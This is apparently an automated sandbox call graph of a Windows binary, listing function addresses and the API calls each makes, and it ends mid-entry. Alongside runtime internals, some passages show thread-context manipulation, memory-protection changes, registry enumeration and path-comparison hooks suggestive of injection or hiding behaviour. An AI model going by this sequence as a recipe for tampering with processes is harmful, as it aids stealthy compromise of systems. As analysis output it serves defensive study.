_invalid_parameter_noinfo 7981->7982 7982->7979 7983 23d0748c7a0 _invalid_parameter_noinfo 18 API calls 7982->7983 7984 23d0748c827 7983->7984 8007 23d07490430 7984->8007 7990 23d0748d233 _invalid_parameter_noinfo 7989->7990 7991 23d0748d208 __vcrt_InitializeCriticalSectionEx 7989->7991 7990->7975 7993 23d0748d068 7991->7993 7994 23d0748d087 FlsGetValue 7993->7994 7996 23d0748d09c 7993->7996 7995 23d0748d094 7994->7995 7994->7996 7995->7990 7996->7995 7997 23d0748d6cc __free_lconv_mon 5 API calls 7996->7997 7998 23d0748d0be 7997->7998 7999 23d0748d0dc FlsSetValue 7998->7999 8002 23d0748d0cc 7998->8002 8000 23d0748d0e8 FlsSetValue 7999->8000 8001 23d0748d0fa 7999->8001 8000->8002 8003 23d0748cb94 __free_lconv_mon 5 API calls 8001->8003 8004 23d0748d744 __free_lconv_mon 5 API calls 8002->8004 8005 23d0748d102 8003->8005 8004->7995 8006 23d0748d744 __free_lconv_mon 5 API calls 8005->8006 8006->7995 8008 23d07490449 8007->8008 8009 23d0748c84f 8007->8009 8008->8009 8015 23d07490a5c 8008->8015 8011 23d0749049c 8009->8011 8012 23d0748c85f 8011->8012 8013 23d074904b5 8011->8013 8012->7968 8013->8012 8059 23d0748ecf0 8013->8059 8020 23d0748ce28 8015->8020 8017 23d07490a6b 8019 23d07490aa4 8017->8019 8055 23d07490acc 8017->8055 8019->8009 8021 23d0748ce3d __vcrt_InitializeCriticalSectionEx 8020->8021 8022 23d0748ce69 FlsSetValue 8021->8022 8023 23d0748ce4c FlsGetValue 8021->8023 8025 23d0748ce7b 8022->8025 8036 23d0748ce59 _invalid_parameter_noinfo 8022->8036 8024 23d0748ce63 8023->8024 8023->8036 8024->8022 8026 23d0748d6cc __free_lconv_mon 5 API calls 8025->8026 8027 23d0748ce8a 8026->8027 8028 23d0748cea8 FlsSetValue 8027->8028 8029 23d0748ce98 FlsSetValue 8027->8029 8031 23d0748cec6 8028->8031 8032 23d0748ceb4 FlsSetValue 8028->8032 8030 23d0748cea1 8029->8030 8034 23d0748d744 __free_lconv_mon 5 API calls 8030->8034 8035 23d0748cb94 __free_lconv_mon 5 API calls 8031->8035 8032->8030 8033 23d0748cee2 8033->8017 8034->8036 8037 23d0748cece 8035->8037 8036->8033 8039 23d0748cf28 FlsSetValue 8036->8039 8040 23d0748cf0d FlsGetValue 8036->8040 8038 23d0748d744 __free_lconv_mon 5 API calls 8037->8038 8038->8036 8042 23d0748cf35 8039->8042 8044 23d0748cf1a 8039->8044 8041 23d0748cf22 8040->8041 8040->8044 8041->8039 8043 23d0748d6cc __free_lconv_mon 5 API calls 8042->8043 8045 23d0748cf44 8043->8045 8044->8017 8046 23d0748cf62 FlsSetValue 8045->8046 8047 23d0748cf52 FlsSetValue 8045->8047 8048 23d0748cf6e FlsSetValue 8046->8048 8049 23d0748cf80 8046->8049 8050 23d0748cf5b 8047->8050 8048->8050 8051 23d0748cb94 __free_lconv_mon 5 API calls 8049->8051 8052 23d0748d744 __free_lconv_mon 5 API calls 8050->8052 8053 23d0748cf88 8051->8053 8052->8044 8054 23d0748d744 __free_lconv_mon 5 API calls 8053->8054 8054->8044 8056 23d07490ade Concurrency::details::SchedulerProxy::DeleteThis 8055->8056 8058 23d07490aeb 8055->8058 8057 23d074907b4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8056->8057 8056->8058 8057->8058 8058->8019 8060 23d0748ce28 _invalid_parameter_noinfo 15 API calls 8059->8060 8061 23d0748ecf9 8060->8061 8438 23d07487a90 8439 23d07487a99 __scrt_acquire_startup_lock 8438->8439 8440 23d07487a9d 8439->8440 8442 23d0748bf5c 8439->8442 8443 23d0748bf7c 8442->8443 8452 23d0748bf93 8442->8452 8444 23d0748bf9a 8443->8444 8445 23d0748bf84 8443->8445 8473 23d0748ec90 8444->8473 8446 23d0748d6ac __free_lconv_mon 5 API calls 8445->8446 8448 23d0748bf89 8446->8448 8450 23d0748d570 _invalid_parameter_noinfo 18 API calls 8448->8450 8450->8452 8452->8440 8456 23d0748befc 5 API calls 8457 23d0748c009 8456->8457 8458 23d0748c029 8457->8458 8459 23d0748c011 8457->8459 8461 23d0748bd34 15 API calls 8458->8461 8460 23d0748d6ac __free_lconv_mon 5 API calls 8459->8460 8462 23d0748c016 8460->8462 8465 23d0748c045 8461->8465 8463 23d0748d744 __free_lconv_mon 5 API calls 8462->8463 8463->8452 8464 23d0748c04b 8466 23d0748d744 __free_lconv_mon 5 API calls 8464->8466 8465->8464 8467 23d0748c077 8465->8467 8468 23d0748c090 8465->8468 8466->8452 8469 23d0748d744 __free_lconv_mon 5 API calls 8467->8469 8471 23d0748d744 __free_lconv_mon 5 API calls 8468->8471 8470 23d0748c080 8469->8470 8472 23d0748d744 __free_lconv_mon 5 API calls 8470->8472 8471->8464 8472->8452 8474 23d0748bf9f 8473->8474 8475 23d0748ec9d 8473->8475 8479 23d0748e374 GetModuleFileNameW 8474->8479 8495 23d0748cefc 8475->8495 8477 23d0748eccc 8512 23d0748e968 8477->8512 8480 23d0748e3b9 __vcrt_InitializeCriticalSectionEx 8479->8480 8481 23d0748e3cd 8479->8481 8484 23d0748d620 5 API calls 8480->8484 8482 23d0748e1b4 15 API calls 8481->8482 8483 23d0748e3fb 8482->8483 8631 23d0748e258 8483->8631 8485 23d0748e3c6 8484->8485 8487 23d07487940 _log10_special 4 API calls 8485->8487 8488 23d0748bfb6 8487->8488 8489 23d0748bd34 8488->8489 8491 23d0748bd72 8489->8491 8493 23d0748bdde 8491->8493 8640 23d0748f040 8491->8640 8492 23d0748becf 8492->8456 8493->8492 8494 23d0748f040 15 API calls 8493->8494 8494->8493 8496 23d0748cf28 FlsSetValue 8495->8496 8497 23d0748cf0d FlsGetValue 8495->8497 8499 23d0748cf35 8496->8499 8501 23d0748cf1a 8496->8501 8498 23d0748cf22 8497->8498 8497->8501 8498->8496 8500 23d0748d6cc __free_lconv_mon 5 API calls 8499->8500 8502 23d0748cf44 8500->8502 8501->8477 8503 23d0748cf62 FlsSetValue 8502->8503 8504 23d0748cf52 FlsSetValue 8502->8504 8505 23d0748cf6e FlsSetValue 8503->8505 8506 23d0748cf80 8503->8506 8507 23d0748cf5b 8504->8507 8505->8507 8508 23d0748cb94 __free_lconv_mon 5 API calls 8506->8508 8509 23d0748d744 __free_lconv_mon 5 API calls 8507->8509 8510 23d0748cf88 8508->8510 8509->8501 8511 23d0748d744 __free_lconv_mon 5 API calls 8510->8511 8511->8501 8535 23d0748ebd8 8512->8535 8517 23d0748ca0c 5 API calls 8518 23d0748e9cb 8517->8518 8519 23d0748e9d3 8518->8519 8521 23d0748e9e2 8518->8521 8520 23d0748d744 __free_lconv_mon 5 API calls 8519->8520 8531 23d0748e9ba 8520->8531 8521->8521 8550 23d0748ed0c 8521->8550 8524 23d0748eade 8525 23d0748d6ac __free_lconv_mon 5 API calls 8524->8525 8526 23d0748eae3 8525->8526 8527 23d0748d744 __free_lconv_mon 5 API calls 8526->8527 8527->8531 8528 23d0748eaf8 8529 23d0748eb39 8528->8529 8532 23d0748d744 __free_lconv_mon 5 API calls 8528->8532 8534 23d0748eba0 8529->8534 8561 23d0748e498 8529->8561 8530 23d0748d744 __free_lconv_mon 5 API calls 8530->8531 8531->8474 8532->8529 8534->8530 8536 23d0748ebfb 8535->8536 8537 23d0748ec05 8536->8537 8539 23d0748d744 __free_lconv_mon 5 API calls 8536->8539 8538 23d0748e99d 8537->8538 8540 23d0748cefc 10 API calls 8537->8540 8543 23d0748e668 8538->8543 8539->8537 8541 23d0748eccc 8540->8541 8542 23d0748e968 37 API calls 8541->8542 8542->8538 8544 23d0748e1b4 15 API calls 8543->8544 8545 23d0748e67c 8544->8545 8546 23d0748e688 GetOEMCP 8545->8546 8547 23d0748e69a 8545->8547 8549 23d0748e6af 8546->8549 8548 23d0748e69f GetACP 8547->8548 8547->8549 8548->8549 8549->8517 8549->8531 8551 23d0748e668 17 API calls 8550->8551 8552 23d0748ed39 8551->8552 8553 23d0748ee8f 8552->8553 8555 23d0748ed76 IsValidCodePage 8552->8555 8560 23d0748ed90 8552->8560 8554 23d07487940 _log10_special 4 API calls 8553->8554 8556 23d0748ead5 8554->8556 8555->8553 8557 23d0748ed87 8555->8557 8556->8524 8556->8528 8558 23d0748edb6 GetCPInfo 8557->8558 8557->8560 8558->8553 8558->8560 8573 23d0748e780 8560->8573 8563 23d0748e4b4 8561->8563 8562 23d0748d6ac __free_lconv_mon 5 API calls 8564 23d0748e550 8562->8564 8563->8562 8566 23d0748e4e1 8563->8566 8565 23d0748d570 _invalid_parameter_noinfo 18 API calls 8564->8565 8565->8566 8567 23d0748e593 8566->8567 8568 23d0748d6ac __free_lconv_mon 5 API calls 8566->8568 8567->8567 8571 23d0748e62d 8567->8571 8572 23d0748d744 __free_lconv_mon 5 API calls 8567->8572 8569 23d0748e5f1 8568->8569 8570 23d0748d570 _invalid_parameter_noinfo 18 API calls 8569->8570 8570->8567 8571->8534 8572->8571 8574 23d0748e7bd GetCPInfo 8573->8574 8575 23d0748e8b3 8573->8575 8574->8575 8580 23d0748e7d0 8574->8580 8576 23d07487940 _log10_special 4 API calls 8575->8576 8577 23d0748e952 8576->8577 8577->8553 8584 23d07491544 8580->8584 8583 23d07491a08 23 API calls 8583->8575 8585 23d0748e1b4 15 API calls 8584->8585 8587 23d07491586 8585->8587 8586 23d074915c3 8589 23d07487940 _log10_special 4 API calls 8586->8589 8587->8586 8588 23d0748ca0c 5 API calls 8587->8588 8590 23d07491680 8587->8590 8592 23d074915ec 8587->8592 8588->8592 8591 23d0748e847 8589->8591 8590->8586 8593 23d0748d744 __free_lconv_mon 5 API calls 8590->8593 8595 23d07491a08 8591->8595 8592->8590 8594 23d07491666 GetStringTypeW 8592->8594 8593->8586 8594->8590 8596 23d0748e1b4 15 API calls 8595->8596 8597 23d07491a2d 8596->8597 8600 23d074916d4 8597->8600 8601 23d07491715 8600->8601 8602 23d074919dd 8601->8602 8605 23d0748ca0c 5 API calls 8601->8605 8606 23d07491895 8601->8606 8608 23d07491797 8601->8608 8603 23d07487940 _log10_special 4 API calls 8602->8603 8604 23d0748e87a 8603->8604 8604->8583 8605->8608 8606->8602 8607 23d0748d744 __free_lconv_mon 5 API calls 8606->8607 8607->8602 8608->8606 8622 23d0748f67c 8608->8622 8610 23d0749183d 8610->8606 8611 23d074918a6 8610->8611 8612 23d07491855 8610->8612 8613 23d0748ca0c 5 API calls 8611->8613 8615 23d07491978 8611->8615 8617 23d074918c4 8611->8617 8612->8606 8614 23d0748f67c 4 API calls 8612->8614 8613->8617 8614->8606 8615->8606 8616 23d0748d744 __free_lconv_mon 5 API calls 8615->8616 8616->8606 8617->8606 8618 23d0748f67c 4 API calls 8617->8618 8619 23d07491944 8618->8619 8619->8615 8620 23d07491992 8619->8620 8620->8606 8621 23d0748d744 __free_lconv_mon 5 API calls 8620->8621 8621->8606 8623 23d0748f394 3 API calls 8622->8623 8624 23d0748f6ba 8623->8624 8625 23d0748f6c2 8624->8625 8628 23d0748f768 8624->8628 8625->8610 8627 23d0748f72b LCMapStringW 8627->8625 8629 23d0748f394 3 API calls 8628->8629 8630 23d0748f796 8629->8630 8630->8627 8632 23d0748e297 8631->8632 8633 23d0748e27c 8631->8633 8634 23d0748e29c 8632->8634 8636 23d0748e2fa __vcrt_InitializeCriticalSectionEx 8632->8636 8633->8485 8634->8633 8635 23d0748d6ac __free_lconv_mon 5 API calls 8634->8635 8635->8633 8636->8633 8637 23d0748d620 5 API calls 8636->8637 8638 23d0748e307 8637->8638 8639 23d0748d6ac __free_lconv_mon 5 API calls 8638->8639 8639->8633 8641 23d0748efcc 8640->8641 8642 23d0748e1b4 15 API calls 8641->8642 8643 23d0748eff0 8642->8643 8643->8491 9568 23d07482990 9569 23d074829e4 9568->9569 9570 23d074829ff 9569->9570 9572 23d07483130 9569->9572 9573 23d074831c6 9572->9573 9575 23d07483155 9572->9575 9573->9570 9574 23d07483844 StrCmpNIW 9574->9575 9575->9573 9575->9574 9576 23d07481ce0 StrCmpIW StrCmpW 9575->9576 9576->9575 8071 23d0748b014 8072 23d07489634 _CreateFrameInfo 4 API calls 8071->8072 8073 23d0748b049 8072->8073 8074 23d07489634 _CreateFrameInfo 4 API calls 8073->8074 8075 23d0748b057 __except_validate_context_record 8074->8075 8076 23d07489634 _CreateFrameInfo 4 API calls 8075->8076 8077 23d0748b09b 8076->8077 8078 23d07489634 _CreateFrameInfo 4 API calls 8077->8078 8079 23d0748b0a4 8078->8079 8080 23d07489634 _CreateFrameInfo 4 API calls 8079->8080 8081 23d0748b0ad 8080->8081 8094 23d07489c54 8081->8094 8084 23d07489634 _CreateFrameInfo 4 API calls 8085 23d0748b0dd __CxxCallCatchBlock 8084->8085 8086 23d07489c90 __CxxCallCatchBlock 4 API calls 8085->8086 8090 23d0748b18e 8086->8090 8087 23d0748b1b7 __CxxCallCatchBlock 8088 23d07489634 _CreateFrameInfo 4 API calls 8087->8088 8089 23d0748b1ca 8088->8089 8091 23d07489634 _CreateFrameInfo 4 API calls 8089->8091 8090->8087 8092 23d07489320 __CxxCallCatchBlock 4 API calls 8090->8092 8093 23d0748b1d3 8091->8093 8092->8087 8095 23d07489634 _CreateFrameInfo 4 API calls 8094->8095 8097 23d07489c65 8095->8097 8096 23d07489c70 8099 23d07489634 _CreateFrameInfo 4 API calls 8096->8099 8097->8096 8098 23d07489634 _CreateFrameInfo 4 API calls 8097->8098 8098->8096 8100 23d07489c81 8099->8100 8100->8084 8100->8085 8976 23d074914a8 8977 23d074914b0 8976->8977 8978 23d074914c5 8977->8978 8980 23d074914de 8977->8980 8979 23d0748d6ac __free_lconv_mon 5 API calls 8978->8979 8981 23d074914ca 8979->8981 8983 23d0748e1b4 15 API calls 8980->8983 8984 23d074914d5 8980->8984 8982 23d0748d570 _invalid_parameter_noinfo 18 API calls 8981->8982 8982->8984 8983->8984 9577 23d0748d128 9578 23d0748d138 9577->9578 9579 23d0748cfa0 __free_lconv_mon 5 API calls 9578->9579 9580 23d0748d143 __vcrt_uninitialize_ptd 9578->9580 9579->9580 8101 23d074935ab 8102 23d074935eb 8101->8102 8103 23d07493850 8101->8103 8102->8103 8105 23d07493832 8102->8105 8106 23d0749361f 8102->8106 8104 23d07493846 8103->8104 8108 23d07494360 _log10_special 10 API calls 8103->8108 8109 23d07494360 8105->8109 8108->8104 8112 23d07494380 8109->8112 8114 23d0749439a 8112->8114 8113 23d0749437b 8113->8104 8114->8113 8116 23d074941c0 8114->8116 8117 23d07494200 _log10_special 8116->8117 8119 23d0749426c _log10_special 8117->8119 8127 23d07494480 8117->8127 8120 23d074942a9 8119->8120 8121 23d07494279 8119->8121 8134 23d074947b0 8120->8134 8130 23d0749409c 8121->8130 8124 23d074942a7 _log10_special 8140 23d07487940 8124->8140 8126 23d074942d1 8126->8113 8147 23d074944a8 8127->8147 8131 23d074940e0 _log10_special 8130->8131 8132 23d074940f5 8131->8132 8133 23d074947b0 _log10_special 5 API calls 8131->8133 8132->8124 8133->8132 8135 23d074947b9 8134->8135 8136 23d074947d0 8134->8136 8138 23d074947c8 8135->8138 8139 23d0748d6ac __free_lconv_mon 5 API calls 8135->8139 8137 23d0748d6ac __free_lconv_mon 5 API calls 8136->8137 8137->8138 8138->8124 8139->8138 8141 23d07487949 8140->8141 8142 23d07487954 8141->8142 8143 23d0748812c IsProcessorFeaturePresent 8141->8143 8142->8126 8144 23d07488144 8143->8144 8151 23d07488320 RtlCaptureContext 8144->8151 8146 23d07488157 8146->8126 8148 23d074944e7 _raise_exc _clrfp 8147->8148 8149 23d074946fc RaiseException 8148->8149 8150 23d074944a2 8149->8150 8150->8119 8152 23d0748833a RtlLookupFunctionEntry 8151->8152 8153 23d07488389 8152->8153 8154 23d07488350 RtlVirtualUnwind 8152->8154 8153->8146 8154->8152 8154->8153 8644 23d0748202c 8645 23d0748205d 8644->8645 8646 23d07482173 8645->8646 8650 23d07482081 8645->8650 8653 23d0748213e 8645->8653 8647 23d074821e7 8646->8647 8648 23d07482178 8646->8648 8652 23d07482f04 9 API calls 8647->8652 8647->8653 8662 23d07482f04 GetProcessHeap 8648->8662 8651 23d074820b9 StrCmpNIW 8650->8651 8650->8653 8655 23d07481bf4 8650->8655 8651->8650 8652->8653 8656 23d07481c1b GetProcessHeap 8655->8656 8657 23d07481c8f 8655->8657 8659 23d07481c41 __free_lconv_mon 8656->8659 8657->8650 8658 23d07481c77 GetProcessHeap HeapFree 8658->8657 8659->8657 8659->8658 8660 23d0748152c 2 API calls 8659->8660 8661 23d07481c6e 8660->8661 8661->8658 8667 23d07482f40 __free_lconv_mon 8662->8667 8663 23d07483015 GetProcessHeap HeapFree 8663->8653 8664 23d07483010 8664->8663 8665 23d07482fa2 StrCmpNIW 8665->8667 8666 23d07481bf4 5 API calls 8666->8667 8667->8663 8667->8664 8667->8665 8667->8666 9581 23d07482b2c 9583 23d07482b9d 9581->9583 9582 23d07482ee0 9583->9582 9584 23d07482bc9 GetModuleHandleA 9583->9584 9585 23d07482bdb __vcrt_InitializeCriticalSectionEx 9584->9585 9585->9582 9586 23d07482c14 StrCmpNIW 9585->9586 9586->9582 9590 23d07482c39 9586->9590 9587 23d0748199c 6 API calls 9587->9590 9588 23d07482e05 lstrlenW 9588->9590 9589 23d07482d4b lstrlenW 9589->9590 9590->9582 9590->9587 9590->9588 9590->9589 9591 23d07483844 StrCmpNIW 9590->9591 9592 23d0748152c StrCmpIW StrCmpW 9590->9592 9591->9590 9592->9590 8985 23d07491aa0 8986 23d0748ec90 37 API calls 8985->8986 8987 23d07491aa9 8986->8987 8988 23d07494c9f 8989 23d07494cb7 8988->8989 8995 23d07494d22 8988->8995 8990 23d07489634 _CreateFrameInfo 4 API calls 8989->8990 8989->8995 8991 23d07494d04 8990->8991 8992 23d07489634 _CreateFrameInfo 4 API calls 8991->8992 8993 23d07494d19 8992->8993 8994 23d0748c6a8 15 API calls 8993->8994 8994->8995 8996 23d07482aa0 8998 23d07482afd 8996->8998 8997 23d07482b18 8998->8997 8999 23d074831e4 3 API calls 8998->8999 8999->8997 9000 23d07485ca3 9001 23d07485cb0 9000->9001 9002 23d07485cbc GetThreadContext 9001->9002 9009 23d07485e1a 9001->9009 9003 23d07485ce2 9002->9003 9002->9009 9004 23d07485d09 9003->9004 9003->9009 9011 23d07485d66 SetThreadContext 9004->9011 9014 23d07485d8d 9004->9014 9005 23d07485e41 VirtualProtect FlushInstructionCache 9005->9009 9006 23d07485f1e 9008 23d07484df0 3 API calls 9006->9008 9007 23d07485efe 9007->9006 9010 23d074843e0 VirtualFree 9007->9010 9015 23d07485f23 9008->9015 9009->9005 9009->9007 9010->9006 9011->9014 9012 23d07485f77 9016 23d07487940 _log10_special 4 API calls 9012->9016 9013 23d07485f37 ResumeThread 9013->9015 9015->9012 9015->9013 9017 23d07485fbf 9016->9017 9018 23d0748d2a4 9019 23d0748d2de 9018->9019 9020 23d0748d306 RtlCaptureContext RtlLookupFunctionEntry 9019->9020 9021 23d0748d376 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9020->9021 9022 23d0748d340 RtlVirtualUnwind 9020->9022 9024 23d0748d3c8 9021->9024 9022->9021 9023 23d07487940 _log10_special 4 API calls 9025 23d0748d3e7 9023->9025 9024->9023 8155 23d0748b3a4 8161 23d0748b2d7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8155->8161 8156 23d0748b3cb 8157 23d07489634 _CreateFrameInfo 4 API calls 8156->8157 8158 23d0748b3d0 8157->8158 8159 23d07489634 _CreateFrameInfo 4 API calls 8158->8159 8160 23d0748b3db __FrameHandler3::GetHandlerSearchState 8158->8160 8159->8160 8161->8156 8161->8160 8162 23d07489ce4 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 8161->8162 8164 23d07489d0c 8161->8164 8162->8161 8165 23d07489634 _CreateFrameInfo 4 API calls 8164->8165 8166 23d07489d1a 8165->8166 8166->8161 9026 23d074814a4 9027 23d074814e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 9026->9027 9028 23d074814c1 GetProcessHeap HeapFree 9026->9028 9029 23d07496180 9027->9029 9028->9027 9028->9028 9593 23d07494d35 9594 23d07489634 _CreateFrameInfo 4 API calls 9593->9594 9595 23d07494d4d 9594->9595 9596 23d07489634 _CreateFrameInfo 4 API calls 9595->9596 9597 23d07494d68 9596->9597 9598 23d07489634 _CreateFrameInfo 4 API calls 9597->9598 9599 23d07494d7c 9598->9599 9600 23d07489634 _CreateFrameInfo 4 API calls 9599->9600 9601 23d07494dbe 9600->9601 9030 23d074858b9 9031 23d074858c0 VirtualProtect 9030->9031 9032 23d074858e9 GetLastError 9031->9032 9033 23d074857d0 9031->9033 9032->9033 9034 23d07483ab9 9035 23d07483a06 9034->9035 9036 23d07483a56 VirtualQuery 9035->9036 9037 23d07483a8a VirtualAlloc 9035->9037 9039 23d07483a70 9035->9039 9036->9035 9036->9039 9038 23d07483abb GetLastError 9037->9038 9037->9039 9038->9035 9038->9039 7645 23d07481abc 7650 23d07481628 GetProcessHeap 7645->7650 7647 23d07481ad2 Sleep SleepEx 7648 23d07481acb 7647->7648 7648->7647 7649 23d07481598 StrCmpIW StrCmpW 7648->7649 7649->7648 7651 23d07481648 __free_lconv_mon 7650->7651 7695 23d07481268 GetProcessHeap 7651->7695 7653 23d07481650 7654 23d07481268 2 API calls 7653->7654 7655 23d07481661 7654->7655 7656 23d07481268 2 API calls 7655->7656 7657 23d0748166a 7656->7657 7658 23d07481268 2 API calls 7657->7658 7659 23d07481673 7658->7659 7660 23d0748168e RegOpenKeyExW 7659->7660 7661 23d074818a6 7660->7661 7662 23d074816c0 RegOpenKeyExW 7660->7662 7661->7648 7663 23d074816e9 7662->7663 7664 23d074816ff RegOpenKeyExW 7662->7664 7699 23d074812bc RegQueryInfoKeyW 7663->7699 7665 23d0748173a RegOpenKeyExW 7664->7665 7666 23d07481723 7664->7666 7669 23d07481775 RegOpenKeyExW 7665->7669 7670 23d0748175e 7665->7670 7710 23d0748104c RegQueryInfoKeyW 7666->7710 7674 23d07481799 7669->7674 7675 23d074817b0 RegOpenKeyExW 7669->7675 7673 23d074812bc 13 API calls 7670->7673 7676 23d0748176b RegCloseKey 7673->7676 7677 23d074812bc 13 API calls 7674->7677 7678 23d074817eb RegOpenKeyExW 7675->7678 7679 23d074817d4 7675->7679 7676->7669 7682 23d074817a6 RegCloseKey 7677->7682 7680 23d07481826 RegOpenKeyExW 7678->7680 7681 23d0748180f 7678->7681 7683 23d074812bc 13 API calls 7679->7683 7685 23d0748184a 7680->7685 7686 23d07481861 RegOpenKeyExW 7680->7686 7684 23d0748104c 5 API calls 7681->7684 7682->7675 7687 23d074817e1 RegCloseKey 7683->7687 7688 23d0748181c RegCloseKey 7684->7688 7689 23d0748104c 5 API calls 7685->7689 7690 23d07481885 7686->7690 7691 23d0748189c RegCloseKey 7686->7691 7687->7678 7688->7680 7692 23d07481857 RegCloseKey 7689->7692 7693 23d0748104c 5 API calls 7690->7693 7691->7661 7692->7686 7694 23d07481892 RegCloseKey 7693->7694 7694->7691 7716 23d07496168 7695->7716 7697 23d07481283 GetProcessHeap 7698 23d074812ae __free_lconv_mon 7697->7698 7698->7653 7700 23d07481327 GetProcessHeap 7699->7700 7701 23d0748148a RegCloseKey 7699->7701 7704 23d0748133e __free_lconv_mon 7700->7704 7701->7664 7702 23d07481476 GetProcessHeap HeapFree 7702->7701 7703 23d07481352 RegEnumValueW 7703->7704 7704->7702 7704->7703 7706 23d0748141e lstrlenW GetProcessHeap 7704->7706 7707 23d074813d3 GetProcessHeap 7704->7707 7708 23d074813f3 GetProcessHeap HeapFree 7704->7708 7709 23d07481443 StrCpyW 7704->7709 7718 23d0748152c 7704->7718 7706->7704 7707->7704 7708->7706 7709->7704 7711 23d074811b5 RegCloseKey 7710->7711 7714 23d074810bf __free_lconv_mon 7710->7714 7711->7665 7712 23d074810cf RegEnumValueW 7712->7714 7713 23d0748114e GetProcessHeap 7713->7714 7714->7711 7714->7712 7714->7713 7715 23d0748116e GetProcessHeap HeapFree 7714->7715 7715->7714 7717 23d07496177 7716->7717 7719 23d07481546 7718->7719 7722 23d0748157c 7718->7722 7720 23d07481565 StrCmpW 7719->7720 7721 23d0748155d StrCmpIW 7719->7721 7719->7722 7720->7719 7721->7719 7722->7704 9602 23d0748253c 9604 23d074825bb 9602->9604 9603 23d074827aa 9604->9603 9605 23d0748261d GetFileType 9604->9605 9606 23d0748262b StrCpyW 9605->9606 9607 23d07482641 9605->9607 9608 23d07482650 9606->9608 9618 23d07481a40 GetFinalPathNameByHandleW 9607->9618 9612 23d0748265a 9608->9612 9615 23d074826ff 9608->9615 9610 23d07483844 StrCmpNIW 9610->9612 9611 23d07483844 StrCmpNIW 9611->9615 9612->9603 9612->9610 9623 23d07483044 StrCmpIW 9612->9623 9627 23d07481cac 9612->9627 9615->9603 9615->9611 9616 23d07483044 4 API calls 9615->9616 9617 23d07481cac 2 API calls 9615->9617 9616->9615 9617->9615 9619 23d07481aa9 9618->9619 9620 23d07481a6a StrCmpNIW 9618->9620 9619->9608 9620->9619 9621 23d07481a84 lstrlenW 9620->9621 9621->9619 9622 23d07481a96 StrCpyW 9621->9622 9622->9619 9624 23d07483076 StrCpyW StrCatW 9623->9624 9625 23d0748308d PathCombineW 9623->9625 9626 23d07483096 9624->9626 9625->9626 9626->9612 9628 23d07481ccc 9627->9628 9629 23d07481cc3 9627->9629 9628->9612 9630 23d0748152c 2 API calls 9629->9630 9630->9628 8668 23d0748f830 GetProcessHeap 8669 23d07487830 8670 23d0748784c 8669->8670 8671 23d07487851 8669->8671 8673 23d07487960 8670->8673 8674 23d074879f7 8673->8674 8675 23d07487983 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8673->8675 8674->8671 8675->8674 9631 23d07482330 9633 23d074823ae 9631->9633 9632 23d074824ea 9633->9632 9634 23d07482413 GetFileType 9633->9634 9635 23d07482435 9634->9635 9636 23d07482421 StrCpyW 9634->9636 9637 23d07481a40 4 API calls 9635->9637 9640 23d07482442 9636->9640 9637->9640 9638 23d07483844 StrCmpNIW 9638->9640 9639 23d07483044 4 API calls 9639->9640 9640->9632 9640->9638 9640->9639 9641 23d07481cac 2 API calls 9640->9641 9641->9640 9642 23d0748c534 9645 23d0748c2e4 9642->9645 9652 23d0748c2ac 9645->9652 9650 23d0748c268 5 API calls 9651 23d0748c317 9650->9651 9653 23d0748c2bc 9652->9653 9654 23d0748c2c1 9652->9654 9655 23d0748c268 5 API calls 9653->9655 9656 23d0748c2c8 9654->9656 9655->9654 9657 23d0748c2d8 9656->9657 9658 23d0748c2dd 9656->9658 9659 23d0748c268 5 API calls 9657->9659 9658->9650 9659->9658 8676 23d07485234 8677 23d0748523a 8676->8677 8688 23d07487870 8677->8688 8682 23d07485337 8684 23d074854bd 8682->8684 8686 23d0748529e 8682->8686 8699 23d07487440 8682->8699 8683 23d074855bb 8684->8683 8685 23d07485637 VirtualProtect 8684->8685 8685->8686 8687 23d07485663 GetLastError 8685->8687 8687->8686 8690 23d0748787b __free_lconv_mon 8688->8690 8689 23d0748527d 8689->8686 8695 23d07483cc0 8689->8695 8690->8689 8693 23d074878a5 8690->8693 8705 23d0748809c 8690->8705 8709 23d074880bc 8693->8709 8696 23d07483cdd 8695->8696 8698 23d07483d4c 8696->8698 8718 23d07483f30 8696->8718 8698->8682 8700 23d07487487 8699->8700 8743 23d07487210 8700->8743 8703 23d07487940 _log10_special 4 API calls 8704 23d074874b1 8703->8704 8704->8682 8706 23d074880aa std::bad_alloc::bad_alloc 8705->8706 8713 23d074894a0 8706->8713 8708 23d074880bb 8710 23d074880ca std::bad_alloc::bad_alloc 8709->8710 8711 23d074894a0 Concurrency::cancel_current_task 2 API calls 8710->8711 8712 23d074878ab 8711->8712 8714 23d074894bf 8713->8714 8715 23d074894e8 RtlPcToFileHeader 8714->8715 8716 23d0748950a RaiseException 8714->8716 8717 23d07489500 8715->8717 8716->8708 8717->8716 8719 23d07483f54 8718->8719 8721 23d07483f77 8718->8721 8719->8721 8732 23d074839e0 8719->8732 8720 23d07483fad 8723 23d07483fdd 8720->8723 8727 23d07483b10 2 API calls 8720->8727 8721->8720 8738 23d07483b10 8721->8738 8725 23d07484013 8723->8725 8728 23d074839e0 3 API calls 8723->8728 8726 23d0748402f 8725->8726 8729 23d074839e0 3 API calls 8725->8729 8730 23d0748404b 8726->8730 8731 23d07483b10 2 API calls 8726->8731 8727->8723 8728->8725 8729->8726 8730->8698 8731->8730 8733 23d07483a01 8732->8733 8734 23d07483a56 VirtualQuery 8733->8734 8735 23d07483a70 8733->8735 8736 23d07483a8a VirtualAlloc 8733->8736 8734->8733 8734->8735 8735->8721 8736->8735 8737 23d07483abb GetLastError 8736->8737 8737->8733 8737->8735 8741 23d07483b28 8738->8741 8739 23d07483b97 8739->8720 8740 23d07483b7d VirtualQuery 8740->8739 8740->8741 8741->8739 8741->8740 8742 23d07483be2 GetLastError 8741->8742 8742->8741 8744 23d0748722b 8743->8744 8745 23d0748724f 8744->8745 8746 23d07487241 SetLastError 8744->8746 8745->8703 8746->8745 8747 23d07489234 8754 23d0748977c 8747->8754 8750 23d07489241 8752 23d0748924a 8752->8750 8764 23d074897c4 8752->8764 8755 23d07489784 8754->8755 8757 23d074897b5 8755->8757 8758 23d0748923d 8755->8758 8768 23d0748a040 8755->8768 8759 23d074897c4 __vcrt_uninitialize_locks DeleteCriticalSection 8757->8759 8758->8750 8760 23d07489710 8758->8760 8759->8758 8761 23d07489720 8760->8761 8762 23d07489fec 